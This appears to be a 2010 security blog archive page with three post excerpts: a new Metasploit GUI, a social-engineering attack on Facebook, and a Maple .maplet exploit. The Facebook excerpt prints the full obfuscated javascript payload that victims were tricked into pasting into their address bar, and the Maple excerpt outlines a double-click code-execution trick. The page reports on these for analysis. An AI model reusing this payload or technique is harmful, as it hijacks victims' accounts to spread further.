Archive for May, 2010

New msfgui

Posted by scriptjunkie in Metasploit on May 27, 2010

Edit: the new gui has been integrated into metasploit. Update and enjoy. Edit: screenshots here: msfgui/ The old msfgui has fallen out of repair, and no longer works on many installs since the right ruby libraries are hard to get and are no longer maintained. But for a number of reasons I still think it’s […]

7 Comments

Facebook social engineering XSS

Posted by scriptjunkie in webapps on May 11, 2010

Found in the wild (http://www.facebook.com/pages/Teacher-asked-Why-do-Boys-Walk-faster-then-Girls-Girls-Talk-more-then-Boys/125748790772279) attempts to trick users by instructing them to type CTRL+C, to copy hidden javascript, then Alt+D to highlight the address bar to paste and run this javascript: javascript:(function(){a=’app121760014508794_iji’;b=’app121760014508794_aja’;rew=’app121760014508794_rew’;qwe=’app121760014508794_qwe’;qtt=’app121760014508794_qtt’;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p}(‘P e=[“\p\g\l\g\I\g\k\g\h\D”,”\l\h\D\k\f”,”\o\f\h\v\k\f\q\f\j\h\J\D\Q\x”,”\y\g\x\x\f\j”,”\g\j\j\f\z\R\K\L\S”,”\p\n\k\A\f”,”\l\A\o\o\f\l\h”,”\k\g\G\f\q\f”,”\l\k\g\j\G”,”\L\r\A\l\f\v\p\f\j\h\l”,”\t\z\f\n\h\f\v\p\f\j\h”,”\t\k\g\t\G”,”\g\j\g\h\v\p\f\j\h”,”\x\g\l\u\n\h\t\y\v\p\f\j\h”,”\l\f\k\f\t\h\w\n\k\k”,”\l\o\q\w\g\j\p\g\h\f\w\T\r\z\q”,”\H\n\U\n\V\H\l\r\t\g\n\k\w\o\z\n\u\y\H\g\j\p\g\h\f\w\x\g\n\k\r\o\W\u\y\u”,”\l\A\I\q\g\h\X\g\n\k\r\o”,”\g\j\u\A\h”,”\o\f\h\v\k\f\q\f\j\h\l\J\D\K\n\o\Y\n\q\f”,”\Z\y\n\z\f”,”\u\r\u\w\t\r\j\h\f\j\h”];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);’,62,85,’||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||qtt|fs|SocialGraphManager|for|in|if|20|qwe|rew|21|2000|4000|3000′.split(‘|’),0,{}))})(); ______________________________________ Looks like the “Dean Edwards packing tool” And according to http://www.strictly-software.com/unpacker here is the unpacked […]

No Comments

Maple exploit

Posted by scriptjunkie in Exploits, Metasploit on May 3, 2010

Exploit for an 0day vulnerability (feature?) in Maple. https://www.metasploit.com/redmine/projects/framework/repository/revisions/9183 Default Maple security settings prevent code from running in a normal maple worksheet (.mw) without user interaction, but those setting do not prevent code in a .maplet from running. Put malicious code at start of .maplet, get the target to double-click and … profit. (As a […]

No Comments